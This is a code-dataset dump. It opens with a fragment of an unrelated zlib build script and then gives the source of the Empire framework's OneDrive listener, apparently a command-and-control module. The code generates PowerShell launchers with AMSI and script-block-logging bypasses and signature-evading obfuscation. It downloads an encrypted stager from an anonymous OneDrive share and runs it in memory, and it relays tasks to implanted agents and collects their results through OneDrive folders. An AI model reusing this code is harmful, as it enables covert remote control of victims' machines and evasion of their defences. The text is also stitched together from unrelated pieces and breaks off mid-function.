"""should_install() -> Bool
        Returns True if zlib is being built; if we're building zlib,
        it will need to be installed.
"""
return self.args.build_zlib
def install(self, host_target):
"""
Install zlib to the target location
"""
path = self.host_install_destdir(host_target)
self.install_with_cmake(['install'], path)
def build(self, host_target):
self.cmake_options.define('BUILD_SHARED_LIBS', 'NO')
self.cmake_options.define('CMAKE_POSITION_INDEPENDENT_CODE', 'YES')
if self.args.zlib_build_variant is None:
self.args.zlib_build_variant = "Release"
self.cmake_options.define('CMAKE_BUILD_TYPE:STRING',
self.args.zlib_build_variant)
self.cmake_options.define('CMAKE_BUILD_TYPE', 'RELEASE')
self.cmake_options.define('SKIP_INSTALL_FILES', 'YES')
self.cmake_options.define('CMAKE_INSTALL_PREFIX', '/usr')
(platform, arch) = host_target.split('-')
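        # host_target strings have the form "<platform>-<arch>"
        # (e.g. "linux-x86_64"); the two halves select the cross-compilation
        # flags and the CMake toolchain file below.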
common_c_flags = ' '.join(self.common_cross_c_flags(platform, arch))
self.cmake_options.define('CMAKE_C_FLAGS', common_c_flags)
self.cmake_options.define('CMAKE_CXX_FLAGS', common_c_flags)
if host_target.startswith("macosx") or \
host_target.startswith("iphone") or \
host_target.startswith("appletv") or \
host_target.startswith("watch"):
toolchain_file = self.generate_darwin_toolchain_file(platform, arch)
self.cmake_options.define('CMAKE_TOOLCHAIN_FILE:PATH', toolchain_file)
elif platform == "linux":
toolchain_file = self.generate_linux_toolchain_file(platform, arch)
self.cmake_options.define('CMAKE_TOOLCHAIN_FILE:PATH', toolchain_file)
self.build_with_cmake(["all"], self.args.zlib_build_variant, [])
| 35.191919 | 82 | 0.648393 |
43c688e3d614c8b3aaba57456499b558fe4921b5 | 44,373 | py | Python | lib/listeners/onedrive.py | CykuTW/Empire | af30a1f20abc09366e9af83b51fb7566b7ebb3bd | [
"BSD-3-Clause"
] | 3 | 2020-03-24T04:37:00.000Z | 2021-04-07T06:05:16.000Z | lib/listeners/onedrive.py | TheWover/Empire | bf0225a773ac2b822b2eb5df655875dc014ca5b0 | [
"BSD-3-Clause"
] | null | null | null | lib/listeners/onedrive.py | TheWover/Empire | bf0225a773ac2b822b2eb5df655875dc014ca5b0 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import print_function
from builtins import str
from builtins import object
import base64
import random
import os
import re
import time
from datetime import datetime
import copy
import traceback
import sys
import json
from pydispatch import dispatcher
from requests import Request, Session
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
from lib.common import bypasses
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Onedrive',
'Author': ['@mr64bit'],
'Description': (
                'Starts an Onedrive listener. Setup instructions here: gist.github.com/mr64bit/3fd8f321717c9a6423f7949d494b6cd9'),
'Category': ('third_party'),
'Comments': ["Note that deleting STAGE0-PS.txt from the staging folder will break existing launchers"]
}
self.options = {
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'onedrive'
},
'ClientID': {
'Description': 'Application ID of the OAuth App.',
'Required': True,
'Value': ''
},
'ClientSecret': {
'Description': 'Client secret of the OAuth App.',
'Required': True,
'Value': ''
},
'AuthCode': {
'Description': 'Auth code given after authenticating OAuth App.',
'Required': True,
'Value': ''
},
'BaseFolder': {
'Description': 'The base Onedrive folder to use for comms.',
'Required': True,
'Value': 'empire'
},
'StagingFolder': {
'Description': 'The nested Onedrive staging folder.',
'Required': True,
'Value': 'staging'
},
'TaskingsFolder': {
'Description': 'The nested Onedrive taskings folder.',
'Required': True,
'Value': 'taskings'
},
'ResultsFolder': {
'Description': 'The nested Onedrive results folder.',
'Required': True,
'Value': 'results'
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
                'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': 'asdf'
},
'PollInterval': {
'Description': 'Polling interval (in seconds) to communicate with Onedrive.',
'Required': True,
'Value': '5'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 10
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 10
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "N/A|Microsoft SkyDriveSync 17.005.0107.0008 ship; Windows NT 10.0 (16299)"
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'RefreshToken': {
'Description': 'Refresh token used to refresh the auth token',
'Required': False,
'Value': ''
},
'RedirectURI': {
'Description': 'Redirect URI of the registered application',
'Required': True,
'Value': "https://login.live.com/oauth20_desktop.srf"
},
'SlackToken': {
'Description': 'Your SlackBot API token to communicate with your Slack instance.',
'Required': False,
'Value': ''
},
'SlackChannel': {
'Description': 'The Slack channel or DM that notifications will be sent to.',
'Required': False,
'Value': '#general'
}
}
self.mainMenu = mainMenu
self.threads = {}
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def default_response(self):
return ''
def validate_options(self):
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# If we don't have an OAuth code yet, give the user a URL to get it
if (str(self.options['RefreshToken']['Value']).strip() == '') and (
str(self.options['AuthCode']['Value']).strip() == ''):
if (str(self.options['ClientID']['Value']).strip() == ''):
print(helpers.color("[!] ClientID needed to generate AuthCode URL!"))
return False
params = {'client_id': str(self.options['ClientID']['Value']).strip(),
'response_type': 'code',
'redirect_uri': self.options['RedirectURI']['Value'],
'scope': 'files.readwrite offline_access'}
req = Request('GET', 'https://login.microsoftonline.com/common/oauth2/v2.0/authorize', params=params)
prep = req.prepare()
print(helpers.color("[*] Get your AuthCode from \"%s\" and try starting the listener again." % prep.url))
return False
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False):
if not language:
print(helpers.color("[!] listeners/onedrive generate_launcher(): No language specified"))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
listener_options = self.mainMenu.listeners.activeListeners[listenerName]['options']
staging_key = listener_options['StagingKey']['Value']
profile = listener_options['DefaultProfile']['Value']
launcher_cmd = listener_options['Launcher']['Value']
staging_key = listener_options['StagingKey']['Value']
poll_interval = listener_options['PollInterval']['Value']
base_folder = listener_options['BaseFolder']['Value'].strip("/")
staging_folder = listener_options['StagingFolder']['Value']
taskings_folder = listener_options['TaskingsFolder']['Value']
results_folder = listener_options['ResultsFolder']['Value']
if language.startswith("power"):
launcher = "$ErrorActionPreference = 'SilentlyContinue';" # Set as empty string for debugging
if safeChecks.lower() == 'true':
launcher = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
launcher += bypasses.scriptBlockLogBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
launcher += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
launcher += bypasses.AMSIBypass2()
launcher += "};"
launcher += helpers.randomize_capitalization(
"[System.Net.ServicePointManager]::Expect100Continue=0;")
launcher += helpers.randomize_capitalization("$wc=New-Object SYstem.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listener_options['DefaultProfile']['Value']
userAgent = profile.split("|")[1]
launcher += "$u='" + userAgent + "';"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
launcher += helpers.randomize_capitalization("$wc.Headers.Add(")
launcher += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
launcher += helpers.randomize_capitalization(
"$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
launcher += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy;")
launcher += helpers.randomize_capitalization("$proxy.Address = '" + proxy.lower() + "';")
launcher += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
if proxyCreds.lower() == "default":
launcher += helpers.randomize_capitalization(
"$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
username = proxyCreds.split(":")[0]
password = proxyCreds.split(":")[1]
domain = username.split("\\")[0]
usr = username.split("\\")[1]
launcher += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "','" + domain + "');"
launcher += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
launcher += "$Script:Proxy = $wc.Proxy;"
# code to turn the key string into a byte array
launcher += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
launcher += ("'%s');" % staging_key)
# this is the minimized RC4 launcher code from rc4.ps1
launcher += helpers.randomize_capitalization(
'$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
launcher += helpers.randomize_capitalization("$data=$wc.DownloadData('")
launcher += self.mainMenu.listeners.activeListeners[listenerName]['stager_url']
launcher += helpers.randomize_capitalization("');$iv=$data[0..3];$data=$data[4..$data.length];")
launcher += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
launcher = helpers.obfuscate(self.mainMenu.installPath, launcher,
obfuscationCommand=obfuscationCommand)
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(launcher, launcher_cmd)
else:
return launcher
if language.startswith("pyth"):
print(helpers.color("[!] listeners/onedrive generate_launcher(): Python agent not implimented yet"))
return "python not implimented yet"
else:
print(helpers.color("[!] listeners/onedrive generate_launcher(): invalid listener name"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, language=None, token=None):
"""
Generate the stager code
"""
if not language:
print(helpers.color("[!] listeners/onedrive generate_stager(): no language specified"))
return None
staging_key = listenerOptions['StagingKey']['Value']
base_folder = listenerOptions['BaseFolder']['Value']
staging_folder = listenerOptions['StagingFolder']['Value']
working_hours = listenerOptions['WorkingHours']['Value']
profile = listenerOptions['DefaultProfile']['Value']
agent_delay = listenerOptions['DefaultDelay']['Value']
if language.lower() == 'powershell':
f = open("%s/data/agent/stagers/onedrive.ps1" % self.mainMenu.installPath)
stager = f.read()
f.close()
stager = stager.replace("REPLACE_STAGING_FOLDER", "%s/%s" % (base_folder, staging_folder))
stager = stager.replace('REPLACE_STAGING_KEY', staging_key)
stager = stager.replace("REPLACE_TOKEN", token)
stager = stager.replace("REPLACE_POLLING_INTERVAL", str(agent_delay))
if working_hours != "":
stager = stager.replace("REPLACE_WORKING_HOURS", working_hours)
randomized_stager = ''
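            # Randomize the capitalization of every non-comment line that has
            # no string literal, as a light signature-evasion measure.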
for line in stager.split("\n"):
line = line.strip()
if not line.startswith("#"):
if "\"" not in line:
randomized_stager += helpers.randomize_capitalization(line)
else:
randomized_stager += line
if encode:
return helpers.enc_powershell(randomized_stager)
elif encrypt:
RC4IV = os.urandom(4)
staging_key = staging_key.encode('UTF-8')
return RC4IV + encryption.rc4(RC4IV + staging_key, randomized_stager.encode('UTF-8'))
else:
return randomized_stager
else:
print(helpers.color("[!] Python agent not available for Onedrive"))
def generate_comms(self, listener_options, client_id, client_secret, token, refresh_token, redirect_uri,
language=None):
staging_key = listener_options['StagingKey']['Value']
base_folder = listener_options['BaseFolder']['Value']
taskings_folder = listener_options['TaskingsFolder']['Value']
results_folder = listener_options['ResultsFolder']['Value']
if not language:
print(helpers.color("[!] listeners/onedrive generate_comms(): No language specified"))
return
if language.lower() == "powershell":
# Function to generate a WebClient object with the required headers
token_manager = """
$Script:TokenObject = @{token="%s";refresh="%s";expires=(Get-Date).addSeconds(3480)};
$script:GetWebClient = {
$wc = New-Object System.Net.WebClient
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$wc.Proxy = $Script:Proxy;
}
if((Get-Date) -gt $Script:TokenObject.expires) {
$data = New-Object System.Collections.Specialized.NameValueCollection
$data.add("client_id", "%s")
$data.add("client_secret", "%s")
$data.add("grant_type", "refresh_token")
$data.add("scope", "files.readwrite offline_access")
$data.add("refresh_token", $Script:TokenObject.refresh)
$data.add("redirect_uri", "%s")
$bytes = $wc.UploadValues("https://login.microsoftonline.com/common/oauth2/v2.0/token", "POST", $data)
$response = [system.text.encoding]::ascii.getstring($bytes)
$Script:TokenObject.token = [regex]::match($response, '"access_token":"(.+?)"').groups[1].value
$Script:TokenObject.refresh = [regex]::match($response, '"refresh_token":"(.+?)"').groups[1].value
$expires_in = [int][regex]::match($response, '"expires_in":([0-9]+)').groups[1].value
$Script:TokenObject.expires = (get-date).addSeconds($expires_in - 15)
}
$wc.headers.add("User-Agent", $script:UserAgent)
$wc.headers.add("Authorization", "Bearer $($Script:TokenObject.token)")
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
$wc
}
""" % (token, refresh_token, client_id, client_secret, redirect_uri)
post_message = """
$script:SendMessage = {
param($packets)
if($packets) {
$encBytes = encrypt-bytes $packets
$RoutingPacket = New-RoutingPacket -encData $encBytes -Meta 5
} else {
$RoutingPacket = ""
}
$wc = (& $GetWebClient)
$resultsFolder = "%s"
try {
try {
$data = $null
$data = $wc.DownloadData("https://graph.microsoft.com/v1.0/drive/root:/$resultsFolder/$($script:SessionID).txt:/content")
} catch {}
if($data -and $data.length -ne 0) {
$routingPacket = $data + $routingPacket
}
$wc = (& $GetWebClient)
$null = $wc.UploadData("https://graph.microsoft.com/v1.0/drive/root:/$resultsFolder/$($script:SessionID).txt:/content", "PUT", $RoutingPacket)
$script:missedChecking = 0
$script:lastseen = get-date
}
catch {
if($_ -match "Unable to connect") {
$script:missedCheckins += 1
}
}
}
""" % ("%s/%s" % (base_folder, results_folder))
get_message = """
$script:lastseen = Get-Date
$script:GetTask = {
try {
$wc = (& $GetWebClient)
$TaskingsFolder = "%s"
#If we haven't sent a message recently...
if($script:lastseen.addseconds($script:AgentDelay * 2) -lt (get-date)) {
(& $SendMessage -packets "")
}
$script:MissedCheckins = 0
$data = $wc.DownloadData("https://graph.microsoft.com/v1.0/drive/root:/$TaskingsFolder/$($script:SessionID).txt:/content")
if($data -and ($data.length -ne 0)) {
$wc = (& $GetWebClient)
$null = $wc.UploadString("https://graph.microsoft.com/v1.0/drive/root:/$TaskingsFolder/$($script:SessionID).txt", "DELETE", "")
if([system.text.encoding]::utf8.getString($data) -eq "RESTAGE") {
Start-Negotiate -T $script:TokenObject.token -SK $SK -PI $PI -UA $UA
}
$Data
}
}
catch {
if($_ -match "Unable to connect") {
$script:MissedCheckins += 1
}
}
}
""" % ("%s/%s" % (base_folder, taskings_folder))
return token_manager + post_message + get_message
def generate_agent(self, listener_options, client_id, client_secret, token, refresh_token, redirect_uri,
language=None):
"""
Generate the agent code
"""
if not language:
print(helpers.color("[!] listeners/onedrive generate_agent(): No language specified"))
return
language = language.lower()
delay = listener_options['DefaultDelay']['Value']
jitter = listener_options['DefaultJitter']['Value']
profile = listener_options['DefaultProfile']['Value']
lost_limit = listener_options['DefaultLostLimit']['Value']
working_hours = listener_options['WorkingHours']['Value']
kill_date = listener_options['KillDate']['Value']
b64_default_response = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "/data/agent/agent.ps1")
agent_code = f.read()
f.close()
comms_code = self.generate_comms(listener_options, client_id, client_secret, token, refresh_token,
redirect_uri, language)
agent_code = agent_code.replace("REPLACE_COMMS", comms_code)
agent_code = helpers.strip_powershell_comments(agent_code)
agent_code = agent_code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
agent_code = agent_code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
agent_code = agent_code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
agent_code = agent_code.replace('$LostLimit = 60', "$LostLimit = " + str(lost_limit))
agent_code = agent_code.replace('$DefaultResponse = ""',
'$DefaultResponse = "' + b64_default_response.decode('UTF-8') + '"')
if kill_date != "":
agent_code = agent_code.replace("$KillDate,", "$KillDate = '" + str(kill_date) + "',")
return agent_code
def start_server(self, listenerOptions):
# Utility functions to handle auth tasks and initial setup
def get_token(client_id, client_secret, code):
params = {'client_id': client_id,
'client_secret': client_secret,
'grant_type': 'authorization_code',
'scope': 'files.readwrite offline_access',
'code': code,
'redirect_uri': redirect_uri}
try:
r = s.post('https://login.microsoftonline.com/common/oauth2/v2.0/token', data=params)
r_token = r.json()
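                # Track expiry locally, 15 seconds early, so the token is
                # refreshed before it can lapse mid-request.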
r_token['expires_at'] = time.time() + (int)(r_token['expires_in']) - 15
r_token['update'] = True
return r_token
except KeyError as e:
print(helpers.color("[!] Something went wrong, HTTP response %d, error code %s: %s" % (
r.status_code, r.json()['error_codes'], r.json()['error_description'])))
raise
def renew_token(client_id, client_secret, refresh_token):
params = {'client_id': client_id,
'client_secret': client_secret,
'grant_type': 'refresh_token',
'scope': 'files.readwrite offline_access',
'refresh_token': refresh_token,
'redirect_uri': redirect_uri}
try:
r = s.post('https://login.microsoftonline.com/common/oauth2/v2.0/token', data=params)
r_token = r.json()
r_token['expires_at'] = time.time() + (int)(r_token['expires_in']) - 15
r_token['update'] = True
return r_token
except KeyError as e:
print(helpers.color("[!] Something went wrong, HTTP response %d, error code %s: %s" % (
r.status_code, r.json()['error_codes'], r.json()['error_description'])))
raise
def test_token(token):
headers = s.headers.copy()
headers['Authorization'] = 'Bearer ' + token
request = s.get("%s/drive" % base_url, headers=headers)
return request.ok
def setup_folders():
if not (test_token(token['access_token'])):
raise ValueError("Could not set up folders, access token invalid")
base_object = s.get("%s/drive/root:/%s" % (base_url, base_folder))
if not (base_object.status_code == 200):
print(helpers.color("[*] Creating %s folder" % base_folder))
params = {'@microsoft.graph.conflictBehavior': 'rename', 'folder': {}, 'name': base_folder}
base_object = s.post("%s/drive/items/root/children" % base_url, json=params)
else:
message = "[*] {} folder already exists".format(base_folder)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
for item in [staging_folder, taskings_folder, results_folder]:
item_object = s.get("%s/drive/root:/%s/%s" % (base_url, base_folder, item))
if not (item_object.status_code == 200):
print(helpers.color("[*] Creating %s/%s folder" % (base_folder, item)))
params = {'@microsoft.graph.conflictBehavior': 'rename', 'folder': {}, 'name': item}
item_object = s.post("%s/drive/items/%s/children" % (base_url, base_object.json()['id']),
json=params)
else:
message = "[*] {}/{} already exists".format(base_folder, item)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
def upload_launcher():
ps_launcher = self.mainMenu.stagers.generate_launcher(listener_name, language='powershell', encode=False,
userAgent='none', proxy='none', proxyCreds='none')
r = s.put("%s/drive/root:/%s/%s/%s:/content" % (base_url, base_folder, staging_folder, "LAUNCHER-PS.TXT"),
data=ps_launcher, headers={"Content-Type": "text/plain"})
if r.status_code == 201 or r.status_code == 200:
item = r.json()
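                # Request an anonymous sharing link and convert its shareId
                # into a direct-download URL the launcher can fetch without
                # authenticating.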
r = s.post("%s/drive/items/%s/createLink" % (base_url, item['id']),
json={"scope": "anonymous", "type": "view"},
headers={"Content-Type": "application/json"})
launcher_url = "https://api.onedrive.com/v1.0/shares/%s/driveitem/content" % r.json()['shareId']
def upload_stager():
ps_stager = self.generate_stager(listenerOptions=listener_options, language='powershell',
token=token['access_token'])
r = s.put("%s/drive/root:/%s/%s/%s:/content" % (base_url, base_folder, staging_folder, "STAGE0-PS.txt"),
data=ps_stager, headers={"Content-Type": "application/octet-stream"})
if r.status_code == 201 or r.status_code == 200:
item = r.json()
r = s.post("%s/drive/items/%s/createLink" % (base_url, item['id']),
json={"scope": "anonymous", "type": "view"},
headers={"Content-Type": "application/json"})
stager_url = "https://api.onedrive.com/v1.0/shares/%s/driveitem/content" % r.json()['shareId']
# Note: the anonymous share-content link is served from api.onedrive.com, not from the graph.microsoft.com base URL used for the other API calls.
self.mainMenu.listeners.activeListeners[listener_name]['stager_url'] = stager_url
else:
print(helpers.color("[!] Something went wrong uploading stager"))
message = r.content
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
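# The two upload helpers above repeat the same "share the item, then build an
# anonymous download URL" steps. A minimal sketch of that pattern as a helper
# (illustrative only -- share_item is not part of the original listener code):
def share_item(item_id):
    # Create an anonymous, view-only sharing link for an uploaded drive item
    # and return the direct-content URL derived from its share id.
    link = s.post("%s/drive/items/%s/createLink" % (base_url, item_id),
                  json={"scope": "anonymous", "type": "view"},
                  headers={"Content-Type": "application/json"})
    return "https://api.onedrive.com/v1.0/shares/%s/driveitem/content" % link.json()['shareId']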
listener_options = copy.deepcopy(listenerOptions)
listener_name = listener_options['Name']['Value']
staging_key = listener_options['StagingKey']['Value']
poll_interval = listener_options['PollInterval']['Value']
client_id = listener_options['ClientID']['Value']
client_secret = listener_options['ClientSecret']['Value']
auth_code = listener_options['AuthCode']['Value']
refresh_token = listener_options['RefreshToken']['Value']
base_folder = listener_options['BaseFolder']['Value']
staging_folder = listener_options['StagingFolder']['Value'].strip('/')
taskings_folder = listener_options['TaskingsFolder']['Value'].strip('/')
results_folder = listener_options['ResultsFolder']['Value'].strip('/')
redirect_uri = listener_options['RedirectURI']['Value']
base_url = "https://graph.microsoft.com/v1.0"
s = Session()
if refresh_token:
token = renew_token(client_id, client_secret, refresh_token)
message = "[*] Refreshed auth token"
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
else:
token = get_token(client_id, client_secret, auth_code)
message = "[*] Got new auth token"
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive")
s.headers['Authorization'] = "Bearer " + token['access_token']
setup_folders()
while True:
# Wait until Empire is aware the listener is running, so we can save our refresh token and stager URL
try:
if listener_name in list(self.mainMenu.listeners.activeListeners.keys()):
upload_stager()
upload_launcher()
break
else:
time.sleep(1)
except AttributeError:
time.sleep(1)
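# Staging naming convention (inferred from the handlers below): agents drop files
# named "<AGENTNAME>_<stage>.txt" into the staging folder, e.g. "A1B2C3D4_1.txt".
# The listener answers stage 1 with "<AGENTNAME>_2.txt" and stage 3 with
# "<AGENTNAME>_4.txt" (the encrypted full agent code).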
while True:
time.sleep(int(poll_interval))
try: # Wrap the whole loop in a try/catch so one error won't kill the listener
if time.time() > token['expires_at']: # Get a new token if the current one has expired
token = renew_token(client_id, client_secret, token['refresh_token'])
s.headers['Authorization'] = "Bearer " + token['access_token']
message = "[*] Refreshed auth token"
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
upload_stager()
if token['update']:
self.mainMenu.listeners.update_listener_options(listener_name, "RefreshToken",
token['refresh_token'])
token['update'] = False
search = s.get("%s/drive/root:/%s/%s?expand=children" % (base_url, base_folder, staging_folder))
for item in search.json()['children']: # Iterate all items in the staging folder
try:
reg = re.search(r"^([A-Z0-9]+)_([0-9])\.txt", item['name'])  # escape the dot so only a literal "." matches
if not reg:
continue
agent_name, stage = reg.groups()
if stage == '1': # Download stage 1, upload stage 2
message = "[*] Downloading {}/{}/{} {}".format(base_folder, staging_folder, item['name'],
item['size'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
content = s.get(item['@microsoft.graph.downloadUrl']).content
lang, return_val = \
self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0]
message = "[*] Uploading {}/{}/{}_2.txt, {} bytes".format(base_folder, staging_folder,
agent_name, str(len(return_val)))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.put("%s/drive/root:/%s/%s/%s_2.txt:/content" % (
base_url, base_folder, staging_folder, agent_name), data=return_val)
message = "[*] Deleting {}/{}/{}".format(base_folder, staging_folder, item['name'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.delete("%s/drive/items/%s" % (base_url, item['id']))
if stage == '3': # Download stage 3, upload stage 4 (full agent code)
message = "[*] Downloading {}/{}/{}, {} bytes".format(base_folder, staging_folder,
item['name'], item['size'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
content = s.get(item['@microsoft.graph.downloadUrl']).content
lang, return_val = \
self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0]
session_key = self.mainMenu.agents.agents[agent_name]['sessionKey']
agent_token = renew_token(client_id, client_secret, token[
'refresh_token']) # Get auth and refresh tokens for the agent to use
agent_code = str(self.generate_agent(listener_options, client_id, client_secret,
agent_token['access_token'],
agent_token['refresh_token'], redirect_uri, lang))
enc_code = encryption.aes_encrypt_then_hmac(session_key, agent_code)
message = "[*] Uploading {}/{}/{}_4.txt, {} bytes".format(base_folder, staging_folder,
agent_name, str(len(enc_code)))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.put("%s/drive/root:/%s/%s/%s_4.txt:/content" % (
base_url, base_folder, staging_folder, agent_name), data=enc_code)
message = "[*] Deleting {}/{}/{}".format(base_folder, staging_folder, item['name'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.delete("%s/drive/items/%s" % (base_url, item['id']))
except Exception as e:
print(helpers.color(
"[!] Could not handle agent staging for listener %s, continuing" % listener_name))
message = traceback.format_exc()
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
agent_ids = self.mainMenu.agents.get_agents_for_listener(listener_name)
for agent_id in agent_ids: # Upload any tasks for the current agents
if isinstance(agent_id,bytes):
agent_id = agent_id.decode('UTF-8')
task_data = self.mainMenu.agents.handle_agent_request(agent_id, 'powershell', staging_key,
update_lastseen=True)
if task_data:
try:
r = s.get("%s/drive/root:/%s/%s/%s.txt:/content" % (
base_url, base_folder, taskings_folder, agent_id))
if r.status_code == 200: # If there's already something there, download and append the new data
task_data = r.content + task_data
message = "[*] Uploading agent tasks for {}, {} bytes".format(agent_id, str(len(task_data)))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
r = s.put("%s/drive/root:/%s/%s/%s.txt:/content" % (
base_url, base_folder, taskings_folder, agent_id), data=task_data)
except Exception as e:
message = "[!] Error uploading agent tasks for {}, {}".format(agent_id, e)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
search = s.get("%s/drive/root:/%s/%s?expand=children" % (base_url, base_folder, results_folder))
for item in search.json()['children']: # For each file in the results folder
try:
agent_id = item['name'].split(".")[0]
for i in range(len(agent_ids)):
    # Only decode bytes; after the first pass through the outer loop the list already holds str.
    if isinstance(agent_ids[i], bytes):
        agent_ids[i] = agent_ids[i].decode('UTF-8')
if agent_id not in agent_ids: # If we don't recognize that agent, upload a message to restage
print(helpers.color(
"[*] Invalid agent, deleting %s/%s and restaging" % (results_folder, item['name'])))
s.put("%s/drive/root:/%s/%s/%s.txt:/content" % (
base_url, base_folder, taskings_folder, agent_id), data="RESTAGE")
s.delete("%s/drive/items/%s" % (base_url, item['id']))
continue
try: # Update the agent's last seen time, from the file timestamp
seen_time = datetime.strptime(item['lastModifiedDateTime'], "%Y-%m-%dT%H:%M:%S.%fZ")
except ValueError: # some timestamps are returned without fractional seconds
seen_time = datetime.strptime(item['lastModifiedDateTime'], "%Y-%m-%dT%H:%M:%SZ")
seen_time = helpers.utc_to_local(seen_time)
self.mainMenu.agents.update_agent_lastseen_db(agent_id, seen_time)
# If the agent is just checking in, the file will only be 1 byte, so no results to fetch
if (item['size'] > 1):
message = "[*] Downloading results from {}/{}, {} bytes".format(results_folder,
item['name'], item['size'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
r = s.get(item['@microsoft.graph.downloadUrl'])
self.mainMenu.agents.handle_agent_data(staging_key, r.content, listener_options,
update_lastseen=True)
message = "[*] Deleting {}/{}".format(results_folder, item['name'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.delete("%s/drive/items/%s" % (base_url, item['id']))
except Exception as e:
message = "[!] Error handling agent results for {}, {}".format(item['name'], e)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
except Exception as e:
print(helpers.color("[!] Something happened in listener %s: %s, continuing" % (listener_name, e)))
message = traceback.format_exc()
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.close()
def start(self, name=''):
"""
